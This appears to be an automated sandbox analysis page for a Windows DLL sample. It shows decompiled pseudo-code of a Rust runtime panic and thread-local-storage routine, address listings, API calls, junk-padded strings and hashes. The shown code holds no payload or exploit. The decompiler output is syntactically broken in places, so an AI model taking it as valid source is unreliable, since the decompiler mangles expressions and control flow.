										_t212 =  !=  ? _t280 : 9;
										_v80 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
										_t318 =  &_v124;
										_v76 =  !=  ? _t280 : 9;
										_v68 =  &_v80;
										_v64 = 0x6e4ade50;
										_v60 =  &_v100;
										_v56 = 0x6e4ade50;
										_v52 =  &_v148;
										_v48 = E6E4ADE70;
										_v108 =  &_v68;
										_v104 = 3;
										if(E6E4AD2A0( &_v92, _t210) == 3) {
											_v20 = 7;
											_v40 = _t318;
											 *((intOrPtr*)( *((intOrPtr*)(_t318 + 4))))( *_t318);
											_t336 = _t336 + 4;
											_t335 = _v40;
											_t295 =  *((intOrPtr*)(_t335 + 4));
											if( *((intOrPtr*)(_t295 + 4)) != 0) {
												_t245 =  *_t335;
												if( *((intOrPtr*)(_t295 + 8)) >= 9) {
													_t245 =  *(_t245 - 4);
												}
												HeapFree( *0x6e4fadc8, 0, _t245);
											}
											HeapFree( *0x6e4fadc8, 0, _t335);
										}
										_t265 = _v128;
										_t219 =  <  ? (_t265 + 0x000000fd & 0x000000ff) + 1 : 0;
										if(_t219 == 0) {
											__imp__AcquireSRWLockExclusive(0x6e4fadac);
											_v68 = 0x6e4ed2c0;
											_v64 = 1;
											_v152 = 0x6e4fadac;
											_v41 = _t265;
											_v60 = 0;
											_v20 = 6;
											_v124 =  &_v41;
											_v120 = E6E4ADEE0;
											_v52 =  &_v124;
											_v48 = 1;
											_t222 = E6E4AD2A0( &_v92, __eflags);
											_t333 =  &_v68;
											__imp__ReleaseSRWLockExclusive(0x6e4fadac);
											__eflags = _t222 - 3;
											if(__eflags != 0) {
												goto L94;
											}
											_v20 = 5;
											_v40 = _t333;
											 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
											_t336 = _t336 + 4;
											goto L89;
										} else {
											if(_t219 == 1) {
												L94:
												_t360 = _v36;
												if(_t360 != 0) {
													asm("lock dec dword [eax]");
													if(_t360 == 0) {
														E6E4AC800(_v84);
													}
												}
												_t334 = _v140;
												_t331 = _v136;
												_t361 = _v72;
												if(_t361 != 0) {
													asm("lock dec dword [eax]");
													if(_t361 == 0) {
														E6E4ADC20(_v72);
													}
												}
												__imp__ReleaseSRWLockShared(0x6e4fadbc);
												_t362 = _v132 - 1;
												_v20 = 0xffffffff;
												if(_v132 > 1) {
													_v68 = 0x6e4eda8c;
													_v64 = 1;
													_v60 = 0;
													_v52 = 0x6e4ecd60;
													_v76 = 0;
													_v80 = 0;
													_v48 = 0;
													_t226 = E6E4AD2A0( &_v80, _t362);
													_v120 =  &_v68;
													_v124 = _t226;
													E6E4AD460( &_v124);
													asm("ud2");
													asm("ud2");
												}
												_t280 = _t331;
												E6E4AD440(_t280, _t334);
												asm("ud2");
												goto L103;
											}
											 *0x6e4fa040 = 0;
											_t356 =  *0x6e4fa040;
											if( *0x6e4fa040 == 0) {
												goto L94;
											}
											_t324 =  &_v68;
											_v68 = 0x6e4ed96c;
											_v64 = 1;
											_v60 = 0;
											_v52 = 0x6e4ecd60;
											_v48 = 0;
											_v20 = 3;
											if(E6E4AD2A0( &_v92, _t356) != 3) {
												goto L94;
											}
											_v40 = _t324;
											_v20 = 4;
											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
											_t336 = _t336 + 4;
											L89:
											_t291 =  *((intOrPtr*)(_v40 + 4));
											if( *((intOrPtr*)(_t291 + 4)) != 0) {
												_t235 =  *_v40;
												if( *((intOrPtr*)(_t291 + 8)) >= 9) {
													_t235 =  *(_t235 - 4);
												}
												HeapFree( *0x6e4fadc8, 0, _t235);
											}
											HeapFree( *0x6e4fadc8, 0, _v40);
											goto L94;
										}
									}
									_t210 = 0;
									goto L104;
								}
								_t210 = 0;
								goto L47;
							}
						}
					}
				}
			}






























































































                          0x6e4ac8cc
                          0x6e4ac8cf
                          0x6e4ac8d6
                          0x6e4ac8dd
                          0x6e4ac8e2
                          0x6e4ac8e7
                          0x6e4ac8f0
                          0x6e4ac8f3
                          0x6e4ac8f9
                          0x6e4ac901
                          0x6e4ac906
                          0x6e4ac908
                          0x6e4ac922
                          0x6e4ac927
                          0x6e4ac92a
                          0x6e4ac92a
                          0x6e4ac92e
                          0x6e4ac931
                          0x6e4ac934
                          0x6e4ac936
                          0x6e4ac9aa
                          0x6e4ac9ad
                          0x6e4aca0a
                          0x6e4aca11
                          0x6e4aca1b
                          0x6e4aca22
                          0x6e4aca29
                          0x6e4aca2d
                          0x6e4aca34
                          0x6e4aca3b
                          0x6e4aca41
                          0x6e4aca44
                          0x6e4aca47
                          0x6e4aca4d
                          0x6e4aca54
                          0x6e4aca57
                          0x6e4aca5e
                          0x6e4aca63
                          0x6e4aca65
                          0x6e4aca6c
                          0x6e4aca74
                          0x6e4aca77
                          0x6e4aca79
                          0x6e4aca7c
                          0x6e4aca7c
                          0x6e4aca7f
                          0x6e4aca82
                          0x6e4aca86
                          0x6e4aca88
                          0x6e4aca8a
                          0x6e4aca8e
                          0x6e4aca90
                          0x6e4aca90
                          0x6e4aca9c
                          0x6e4aca9c
                          0x6e4acaaa
                          0x6e4acaaa
                          0x00000000
                          0x6e4aca65
                          0x6e4ac9b2
                          0x6e4ac9b5
                          0x6e4ac9bc
                          0x6e4ac9c3
                          0x6e4ac9ca
                          0x6e4ac9d1
                          0x6e4ac9d5
                          0x6e4ac9dc
                          0x6e4ac9e3
                          0x6e4ac9e8
                          0x6e4ac9ea
                          0x00000000
                          0x6e4ac9f0
                          0x6e4ac9f5
                          0x6e4ac9fd
                          0x6e4aca00
                          0x6e4aca02
                          0x00000000
                          0x6e4aca02
                          0x6e4ac93d
                          0x6e4ac93d
                          0x6e4ac945
                          0x6e4ac94b
                          0x6e4ac955
                          0x6e4ac95c
                          0x6e4ac963
                          0x6e4ac969
                          0x6e4ac96c
                          0x6e4ac96f
                          0x6e4ac972
                          0x6e4ac975
                          0x6e4ac97a
                          0x6e4ac97d
                          0x6e4ac97f
                          0x6e4acab3
                          0x6e4acab3
                          0x6e4acab6
                          0x6e4acab8
                          0x6e4acb8b
                          0x6e4acb90
                          0x6e4acb93
                          0x6e4acb96
                          0x6e4acd97
                          0x00000000
                          0x6e4acd97
                          0x6e4acb9c
                          0x6e4acb9f
                          0x6e4acd90
                          0x00000000
                          0x6e4acd90
                          0x6e4acba5
                          0x6e4acba7
                          0x00000000
                          0x00000000
                          0x6e4acbb0
                          0x6e4acbb5
                          0x6e4acbb8
                          0x6e4acbbb
                          0x6e4acbbd
                          0x00000000
                          0x00000000
                          0x6e4acbc3
                          0x00000000
                          0x6e4acbc3
                          0x6e4acabe
                          0x00000000
                          0x6e4ac985
                          0x6e4ac99d
                          0x6e4ac9a2
                          0x6e4acdbe
                          0x6e4acdbe
                          0x6e4acdc0
                          0x6e4acdc0
                          0x6e4acdc5
                          0x6e4acaf3
                          0x6e4acaf3
                          0x6e4acaf6
                          0x6e4acaf9
                          0x6e4acb00
                          0x6e4acb02
                          0x6e4acb07
                          0x6e4acb07
                          0x6e4acb0d
                          0x6e4acb16
                          0x6e4acbf3
                          0x6e4acbf3
                          0x6e4acbf8
                          0x6e4acbfa
                          0x6e4acbfc
                          0x6e4acc01
                          0x6e4acc01
                          0x6e4acc07
                          0x6e4acc0d
                          0x6e4acc0f
                          0x6e4acdcf
                          0x6e4acdd4
                          0x6e4acdd6
                          0x6e4acde6
                          0x6e4acdeb
                          0x6e4acdf0
                          0x6e4acdf2
                          0x6e4ace32
                          0x6e4ace38
                          0x6e4ace3f
                          0x6e4ace41
                          0x6e4ace46
                          0x6e4ace48
                          0x6e4ace4f
                          0x6e4ace52
                          0x6e4ace57
                          0x6e4ace57
                          0x6e4ace5c
                          0x00000000
                          0x6e4ace5c
                          0x6e4acdf4
                          0x6e4acdfe
                          0x6e4ace03
                          0x6e4ace05
                          0x6e4ace05
                          0x6e4ace08
                          0x6e4ace0b
                          0x6e4ace0e
                          0x6e4aceb8
                          0x6e4acebe
                          0x6e4acec9
                          0x6e4acec9
                          0x6e4acece
                          0x6e4acece
                          0x6e4aced0
                          0x6e4aced0
                          0x6e4aced2
                          0x6e4acedd
                          0x6e4acedd
                          0x6e4acee2
                          0x6e4acee2
                          0x6e4aceed
                          0x6e4acef5
                          0x6e4acef8
                          0x6e4acefb
                          0x6e4acefb
                          0x6e4acefb
                          0x6e4acac1
                          0x6e4acac1
                          0x6e4acac7
                          0x6e4acaca
                          0x6e4acaca
                          0x6e4acad0
                          0x6e4acad3
                          0x6e4acad5
                          0x6e4acae3
                          0x6e4acae3
                          0x6e4acae5
                          0x6e4acbcd
                          0x6e4acbd0
                          0x6e4acbde
                          0x6e4acbe0
                          0x00000000
                          0x00000000
                          0x6e4acbe6
                          0x6e4acbe9
                          0x6e4acbeb
                          0x00000000
                          0x6e4acbeb
                          0x6e4acaeb
                          0x6e4acaee
                          0x6e4acaf0
                          0x00000000
                          0x6e4acaf0
                          0x6e4acec0
                          0x6e4acec2
                          0x00000000
                          0x6e4acec2
                          0x6e4ace14
                          0x6e4ace17
                          0x00000000
                          0x00000000
                          0x6e4ace1d
                          0x6e4ace20
                          0x00000000
                          0x00000000
                          0x6e4ace26
                          0x6e4ace28
                          0x00000000
                          0x6e4ace28
                          0x6e4acdd8
                          0x6e4acddd
                          0x6e4acddf
                          0x00000000
                          0x00000000
                          0x6e4acde1
                          0x00000000
                          0x6e4acc15
                          0x6e4acc15
                          0x6e4acc17
                          0x6e4acc1a
                          0x6e4ace62
                          0x6e4ace62
                          0x6e4ace65
                          0x6e4ace68
                          0x6e4ace68
                          0x6e4ace6b
                          0x6e4ace71
                          0x6e4ace78
                          0x6e4ace7f
                          0x6e4ace85
                          0x6e4ace87
                          0x6e4ace8d
                          0x6e4ace90
                          0x6e4ace96
                          0x6e4ace96
                          0x6e4ace90
                          0x6e4ace87
                          0x00000000
                          0x6e4ace7f
                          0x6e4acc20
                          0x6e4acc27
                          0x6e4acc2e
                          0x6e4acc2e
                          0x00000000
                          0x6e4acc2e
                          0x6e4acb1c
                          0x6e4acb1f
                          0x6e4acb21
                          0x00000000
                          0x00000000
                          0x6e4acb27
                          0x6e4acb2a
                          0x6e4acb2d
                          0x6e4acdb6
                          0x6e4acdbb
                          0x00000000
                          0x6e4acdbb
                          0x6e4acb33
                          0x6e4acb39
                          0x6e4acb3e
                          0x6e4acb40
                          0x6e4acb43
                          0x6e4acb4a
                          0x6e4acb4f
                          0x6e4acb52
                          0x6e4acb54
                          0x6e4acb57
                          0x6e4acb59
                          0x6e4acb5b
                          0x6e4acb5e
                          0x6e4acb60
                          0x6e4acb63
                          0x6e4acb63
                          0x6e4acb5e
                          0x6e4acb68
                          0x6e4acb68
                          0x6e4acb6b
                          0x6e4acb6e
                          0x6e4acaaf
                          0x6e4acaaf
                          0x6e4acab1
                          0x00000000
                          0x6e4acb74
                          0x6e4acb74
                          0x6e4acb78
                          0x6e4acb7b
                          0x6e4acb7e
                          0x6e4acea0
                          0x6e4acea6
                          0x6e4acea8
                          0x6e4aceab
                          0x6e4ad062
                          0x6e4ad062
                          0x6e4ad067
                          0x6e4ad068
                          0x6e4ad068
                          0x6e4acc30
                          0x6e4acc37
                          0x6e4acc3e
                          0x6e4acc45
                          0x6e4acc4c
                          0x6e4acc50
                          0x6e4acc57
                          0x6e4acc5e
                          0x6e4acc65
                          0x6e4acc6d
                          0x6e4acc70
                          0x6e4acc76
                          0x6e4acc79
                          0x6e4acc7f
                          0x6e4acc85
                          0x6e4acc8c
                          0x6e4acc95
                          0x6e4acc9c
                          0x6e4acca2
                          0x6e4acca9
                          0x6e4accac
                          0x6e4accba
                          0x6e4accc1
                          0x6e4accc9
                          0x6e4acccc
                          0x6e4accce
                          0x6e4accd1
                          0x6e4accd4
                          0x6e4accdb
                          0x6e4accdd
                          0x6e4acce3
                          0x6e4acce5
                          0x6e4acce5
                          0x6e4accf1
                          0x6e4accf1
                          0x6e4accff
                          0x6e4accff
                          0x6e4acd04
                          0x6e4acd15
                          0x6e4acd1a
                          0x6e4acf0b
                          0x6e4acf1a
                          0x6e4acf21
                          0x6e4acf28
                          0x6e4acf32
                          0x6e4acf35
                          0x6e4acf3c
                          0x6e4acf43
                          0x6e4acf49
                          0x6e4acf50
                          0x6e4acf53
                          0x6e4acf5a
                          0x6e4acf5f
                          0x6e4acf68
                          0x6e4acf6e
                          0x6e4acf71
                          0x00000000
                          0x00000000
                          0x6e4acf78
                          0x6e4acf80
                          0x6e4acf83
                          0x6e4acf85
                          0x00000000
                          0x6e4acd20
                          0x6e4acd23
                          0x6e4acfc0
                          0x6e4acfc3
                          0x6e4acfc5
                          0x6e4acfc7
                          0x6e4acfca
                          0x6e4acfcf
                          0x6e4acfcf
                          0x6e4acfca
                          0x6e4acfd7
                          0x6e4acfdd
                          0x6e4acfe3
                          0x6e4acfe5
                          0x6e4acfe7
                          0x6e4acfea
                          0x6e4acfef
                          0x6e4acfef
                          0x6e4acfea
                          0x6e4acff9
                          0x6e4acfff
                          0x6e4ad003
                          0x6e4ad00a
                          0x6e4ad012
                          0x6e4ad019
                          0x6e4ad020
                          0x6e4ad027
                          0x6e4ad02e
                          0x6e4ad032
                          0x6e4ad039
                          0x6e4ad040
                          0x6e4ad048
                          0x6e4ad04b
                          0x6e4ad04e
                          0x6e4ad053
                          0x6e4ad055
                          0x6e4ad055
                          0x6e4ad057
                          0x6e4ad05b
                          0x6e4ad060
                          0x00000000
                          0x6e4ad060
                          0x6e4acd2b
                          0x6e4acd31
                          0x6e4acd33
                          0x00000000
                          0x00000000
                          0x6e4acd3c
                          0x6e4acd3f
                          0x6e4acd46
                          0x6e4acd4d
                          0x6e4acd54
                          0x6e4acd5b
                          0x6e4acd62
                          0x6e4acd70
                          0x00000000
                          0x00000000
                          0x6e4acd7b
                          0x6e4acd7e
                          0x6e4acd86
                          0x6e4acd88
                          0x6e4acf88
                          0x6e4acf8b
                          0x6e4acf92
                          0x6e4acf9b
                          0x6e4acf9d
                          0x6e4acf9f
                          0x6e4acf9f
                          0x6e4acfab
                          0x6e4acfab
                          0x6e4acfbb
                          0x00000000
                          0x6e4acfbb
                          0x6e4acd1a
                          0x6e4aceb1
                          0x00000000
                          0x6e4aceb1
                          0x6e4acb84
                          0x00000000
                          0x6e4acb84
                          0x6e4acb6e
                          0x6e4acb16
                          0x6e4ac97f

                          APIs
                            • Part of subcall function 6E4AD1B0: TlsGetValue.KERNEL32(00000000,00000001,6E4AC906), ref: 6E4AD1BB
                            • Part of subcall function 6E4AD1B0: TlsGetValue.KERNEL32(00000000), ref: 6E4AD1F3
                          • AcquireSRWLockShared.KERNEL32(6E4FADBC), ref: 6E4AC945
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6E4ACA9C
                          • HeapFree.KERNEL32(00000000,?), ref: 6E4ACAAA
                          • TlsGetValue.KERNEL32(00000000), ref: 6E4ACB0D
                          • TlsGetValue.KERNEL32(00000000), ref: 6E4ACC07
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6E4ACCF1
                          • HeapFree.KERNEL32(00000000,?), ref: 6E4ACCFF
                          • GetProcessHeap.KERNEL32 ref: 6E4ACDD8
                          • HeapAlloc.KERNEL32(00B00000,00000000,00000010), ref: 6E4ACDEB
                          • TlsSetValue.KERNEL32(00000000,00000000,00B00000,00000000,00000010), ref: 6E4ACE5C
                          • HeapFree.KERNEL32(00000000,00000000,00B00000,00000000,00000010), ref: 6E4ACEDD
                          Strings
                          • cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf, xrefs: 6E4AC90D, 6E4AC988
                          • Y3Kn, xrefs: 6E4AC8C5
                          • Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6E4ACDC0
                          • already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl, xrefs: 6E4ACDA1
                          • full, xrefs: 6E4ACEB8
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Heap$FreeValue$AcquireAllocLockProcessShared
                          • String ID: Box<dyn Any><unnamed>thread '' panicked at '', $Y3Kn$already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl$cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf$full
                          • API String ID: 2275035175-2562584196
                          • Opcode ID: 08eb32b55e021cd629c6f676feb8c1379a8cc3fd2b541bcd3d8fd1a9dabbe111
                          • Instruction ID: 7d1d266a1232f88bf1ffaa08ef35b85c57b0e559dea1ca1b43c94141a842cf9d
                          • Opcode Fuzzy Hash: 08eb32b55e021cd629c6f676feb8c1379a8cc3fd2b541bcd3d8fd1a9dabbe111
                          • Instruction Fuzzy Hash: FD123670A00219CFDB50CFF8C854B9EBBB5BF55329F10851ADA15AB388D776A846CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AC890, Relevance: 26.7, APIs: 12, Strings: 3, Instructions: 409memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 64%
                          			E6E4AC890(long _a4, signed int _a8) {
				intOrPtr _v4;
				void* _v20;
				void _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v41;
				long _v48;
				long* _v52;
				intOrPtr _v56;
				long _v60;
				void _v64;
				long* _v68;
				long _v72;
				char _v76;
				long* _v80;
				void* _v84;
				char _v88;
				long _v92;
				char* _v96;
				long _v100;
				void* _v104;
				void** _v108;
				void* _v112;
				long _v116;
				void* _v120;
				long _v124;
				char _v128;
				intOrPtr _v132;
				void _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr* _t193;
				void* _t197;
				void _t198;
				intOrPtr* _t199;
				signed int _t200;
				signed int _t202;
				char* _t204;
				long _t205;
				long _t206;
				void* _t207;
				void* _t208;
				long _t209;
				void _t212;
				void _t213;
				void* _t222;
				void* _t225;
				long _t229;
				void* _t238;
				void* _t248;
				void* _t250;
				void* _t251;
				char** _t254;
				char** _t255;
				void* _t259;
				void* _t263;
				void _t268;
				char _t269;
				signed char _t271;
				void* _t274;
				void _t275;
				intOrPtr _t278;
				void* _t280;
				char* _t281;
				void _t282;
				void* _t285;
				intOrPtr _t296;
				intOrPtr _t300;
				void _t303;
				long _t307;
				intOrPtr _t312;
				void* _t314;
				void* _t315;
				signed int _t316;
				signed int _t318;
				void* _t324;
				intOrPtr* _t330;
				long _t332;
				void* _t333;
				void* _t337;
				void* _t338;
				void* _t340;
				void* _t341;
				void* _t342;
				void* _t343;
				void _t346;
				void* _t347;
				void* _t348;
				void* _t359;
				void* _t372;
				long _t373;

				 *_t346 = _t274;
				_v4 = _t312;
				_t275 = _t346;
				_push(_a4);
				_push(0);
				L1();
				_t347 = _t346 + 8;
				asm("ud2");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t348 = _t347 - 0x88;
				_v40 = _t348;
				_v28 = 0xffffffff;
				_v32 = E6E4B3B50;
				_t268 = _t275;
				_t340 = 1;
				_t337 = 0x6e4ed9cc;
				_v36 =  *[fs:0x0];
				 *[fs:0x0] =  &_v36;
				asm("lock xadd [0x6e4fadc0], esi");
				_t193 = E6E4AD1B0(_t268, 0x6e4ed9cc);
				_t349 = _t193;
				if(_t193 == 0) {
					_t193 = E6E4C6EE0(_t268,  &M6E4ED0E7, 0x46, _t349,  &_v68, 0x6e4ed060, 0x6e4ed1ac);
					_t348 = _t348 + 0xc;
					asm("ud2");
				}
				_t314 = _a8;
				_t278 =  *_t193 + 1;
				 *_t193 = _t278;
				if(_t340 < 0 || _t278 >= 3) {
					__eflags = _t278 - 2;
					if(__eflags <= 0) {
						_v124 = 0x6e4ecd60;
						_v120 = 0x6e4ed014;
						_v68 = 0x6e4eda50;
						_v64 = 2;
						_v96 = 0;
						_v100 = 0;
						_v60 = 0;
						_v116 = _a4;
						_v112 = _t314;
						_t315 =  &_v68;
						_v80 =  &_v124;
						_v76 = E6E4A2640;
						_v52 =  &_v80;
						_v48 = 1;
						_t197 = E6E4AD2A0( &_v100, __eflags);
						__eflags = _t197 - 3;
						if(_t197 == 3) {
							_v20 = 0;
							_v36 = _t315;
							 *((intOrPtr*)( *((intOrPtr*)(_t315 + 4))))( *_t315);
							_t348 = _t348 + 4;
							L12:
							_t340 = _v36;
							_t307 =  *(_t340 + 4);
							__eflags =  *(4 + _t307);
							if( *(4 + _t307) != 0) {
								HeapFree( *0x6e4fadc8, 0, _t259);
							}
							_t197 = HeapFree( *0x6e4fadc8, 0, _t340);
						}
						goto L17;
					}
					_t333 =  &_v68;
					_v68 = 0x6e4eda14;
					_v64 = 1;
					_v60 = 0;
					_v52 = 0x6e4ecd60;
					_v120 = 0;
					_v124 = 0;
					_v48 = 0;
					_t197 = E6E4AD2A0( &_v124, __eflags);
					__eflags = _t197 - 3;
					if(_t197 != 3) {
						goto L17;
					} else {
						_v20 = 1;
						_v36 = _t333;
						 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
						_t348 = _t348 + 4;
						goto L12;
					}
				} else {
					_v132 = _t278;
					__imp__AcquireSRWLockShared(0x6e4fadbc);
					_v144 = 0x6e4fadbc;
					_v20 = 2;
					_v136 = _t268;
					_v140 = _t337;
					_t263 =  *((intOrPtr*)(_t337 + 0x10))(_t268);
					_t348 = _t348 + 4;
					_v36 = _t263;
					_v40 = _t314;
					_t197 = E6E4AD1B0(_t268, _t337);
					_t337 = _v40;
					_t352 = _t197;
					if(_t197 != 0) {
						L18:
						__eflags =  *_t197 - 1;
						_t280 = 1;
						if( *_t197 <= 1) {
							_t198 =  *0x6e4fadb0; // 0x0
							_t316 = _a8;
							__eflags = _t198 - 2;
							if(_t198 == 2) {
								_t280 = 0;
								goto L20;
							}
							__eflags = _t198 - 1;
							if(_t198 == 1) {
								_t280 = 4;
								goto L20;
							}
							__eflags = _t198;
							if(_t198 != 0) {
								goto L20;
							}
							E6E4AD530(_t268,  &_v68, _t337, _t340);
							_t337 = _v40;
							_t251 = _v68;
							__eflags = _t251;
							if(_t251 != 0) {
								goto L69;
							}
							_t271 = 5;
							goto L87;
						}
						_t316 = _a8;
						goto L20;
					} else {
						E6E4C6EE0(_t268,  &M6E4ED0E7, 0x46, _t352,  &_v68, 0x6e4ed060, 0x6e4ed1ac);
						_t348 = _t348 + 0xc;
						L62:
						asm("ud2");
						L63:
						_t281 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
						_t204 = 0xc;
						L22:
						_v100 = _t281;
						_v96 = _t204;
						_t205 =  *0x6e4fa044; // 0x0
						if(_t205 == 0) {
							_t285 = 0x6e4fa044;
							_t205 = E6E4B2B10(_t268, 0x6e4fa044, _t337, _t340);
						}
						_t197 = TlsGetValue(_t205);
						if(_t197 <= 1) {
							L43:
							_t206 =  *0x6e4fa044; // 0x0
							__eflags = _t206;
							if(_t206 == 0) {
								_t285 = 0x6e4fa044;
								_t206 = E6E4B2B10(_t268, 0x6e4fa044, _t337, _t340);
							}
							_t197 = TlsGetValue(_t206);
							__eflags = _t197;
							if(_t197 == 0) {
								_t207 =  *0x6e4fadc8; // 0xb00000
								__eflags = _t207;
								if(_t207 != 0) {
									L67:
									_t208 = HeapAlloc(_t207, 0, 0x10);
									__eflags = _t208;
									if(__eflags != 0) {
										 *_t208 = 0;
										 *(_t208 + 0xc) = 0x6e4fa044;
										_t340 = _t208;
										_t209 =  *0x6e4fa044; // 0x0
										__eflags = _t209;
										if(_t209 == 0) {
											_v36 = _t340;
											_t209 = E6E4B2B10(_t268, 0x6e4fa044, _t337, _t340);
											_t340 = _v36;
										}
										_t197 = TlsSetValue(_t209, _t340);
										goto L76;
									}
									L68:
									_t251 = E6E4C6C30(_t268, 0x10, 4, _t337, _t340, __eflags);
									asm("ud2");
									L69:
									_t332 = _v60;
									_t303 = _v64;
									__eflags = _t332 - 4;
									if(_t332 == 4) {
										__eflags =  *_t251 - 0x6c6c7566;
										if( *_t251 != 0x6c6c7566) {
											L84:
											_t340 = 2;
											_t271 = 0;
											__eflags = 0;
											L85:
											__eflags = _t303;
											if(_t303 != 0) {
												HeapFree( *0x6e4fadc8, 0, _t251);
											}
											L87:
											__eflags = _t271 - 5;
											_t316 = _a8;
											_t273 =  !=  ? _t340 : 1;
											_t280 =  !=  ? _t271 & 0x000000ff : 4;
											_t144 =  !=  ? _t340 : 1;
											_t268 =  *0x6e4fadb0;
											 *0x6e4fadb0 =  !=  ? _t340 : 1;
											L20:
											_v148 = _t316;
											_v128 = _t280;
											_t61 = _t337 + 0xc; // 0x6e4b3440
											_t199 =  *_t61;
											_v40 = _t199;
											_t200 =  *_t199(_v36);
											_t348 = _t348 + 4;
											_t318 = _t316 ^ 0x7ef2a91e | _t200 ^ 0xecc7bcf4;
											__eflags = _t318;
											if(__eflags != 0) {
												_t202 = _v40(_v36);
												_t348 = _t348 + 4;
												__eflags = _t318 ^ 0xe43a67d8 | _t202 ^ 0xbae7a625;
												if(__eflags != 0) {
													goto L63;
												}
												_t254 = _v36;
												_t281 =  *_t254;
												_t204 = _t254[2];
												goto L22;
											}
											_t255 = _v36;
											_t281 =  *_t255;
											_t204 = _t255[1];
											goto L22;
										}
										_t271 = 1;
										_t340 = 3;
										goto L85;
									}
									__eflags = _t332 - 1;
									if(_t332 != 1) {
										goto L84;
									}
									__eflags =  *_t251 - 0x30;
									if( *_t251 != 0x30) {
										goto L84;
									}
									_t271 = 4;
									_t340 = 1;
									goto L85;
								}
								_t207 = GetProcessHeap();
								__eflags = _t207;
								if(__eflags == 0) {
									goto L68;
								}
								 *0x6e4fadc8 = _t207;
								goto L67;
							} else {
								_t340 = _t197;
								__eflags = _t197 - 1;
								if(_t197 != 1) {
									L76:
									_t282 =  *(_t340 + 8);
									__eflags =  *_t340;
									_t138 = _t340 + 4; // 0x4
									_t337 = _t138;
									 *_t340 = 1;
									 *(_t340 + 4) = 0;
									 *(_t340 + 8) = 0;
									if(__eflags != 0) {
										__eflags = _t282;
										if(__eflags != 0) {
											asm("lock dec dword [ecx]");
											if(__eflags == 0) {
												_t197 = E6E4AC800(_t282);
											}
										}
									}
									goto L27;
								}
								_v84 = 0;
								_v36 = 0;
								_t213 = 0;
								__eflags = 0;
								goto L48;
							}
						} else {
							_t337 = _t197;
							if( *_t197 != 1) {
								goto L43;
							}
							_t337 = _t337 + 4;
							L27:
							if( *_t337 != 0) {
								E6E4C6EE0(_t268, "already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl", 0x10, __eflags,  &_v68, 0x6e4ed050, 0x6e4ed720);
								_t348 = _t348 + 0xc;
								goto L62;
							}
							 *_t337 = 0xffffffff;
							_t340 =  *(_t337 + 4);
							if(_t340 == 0) {
								_v36 = _t337;
								_v20 = 8;
								_t250 = E6E4AC690(_t268, _t337, _t340);
								_t337 = _v36;
								_t340 = _t250;
								_t197 =  *(_t337 + 4);
								_t359 = _t197;
								if(_t359 != 0) {
									asm("lock dec dword [eax]");
									if(_t359 == 0) {
										_t285 =  *(_t337 + 4);
										_t197 = E6E4AC800(_t285);
									}
								}
								 *(_t337 + 4) = _t340;
							}
							asm("lock inc dword [esi]");
							if(_t359 <= 0) {
								L17:
								asm("ud2");
								asm("ud2");
								goto L18;
							} else {
								 *_t337 =  *_t337 + 1;
								_v84 = _t340;
								_v36 = _t340;
								if(_t340 != 0) {
									_t212 =  *(_t340 + 0x10);
									__eflags = _t212;
									_t285 =  ==  ? _t212 : _t340 + 0x10;
									if(__eflags != 0) {
										L104:
										_t213 =  *_t285;
										_t285 =  *((intOrPtr*)(_t285 + 4)) - 1;
										L105:
										_v20 = 3;
										L48:
										_v124 = 0x6e4ed8fc;
										_v120 = 4;
										_v72 = 0;
										_v88 = 0;
										_v92 = 0;
										_v116 = 0;
										_v20 = 3;
										_t323 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
										_t215 =  !=  ? _t285 : 9;
										_v80 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
										_t324 =  &_v124;
										_v76 =  !=  ? _t285 : 9;
										_v68 =  &_v80;
										_v64 = 0x6e4ade50;
										_v60 =  &_v100;
										_v56 = 0x6e4ade50;
										_v52 =  &_v148;
										_v48 = E6E4ADE70;
										_v108 =  &_v68;
										_v104 = 3;
										if(E6E4AD2A0( &_v92, _t213) == 3) {
											_v20 = 7;
											_v40 = _t324;
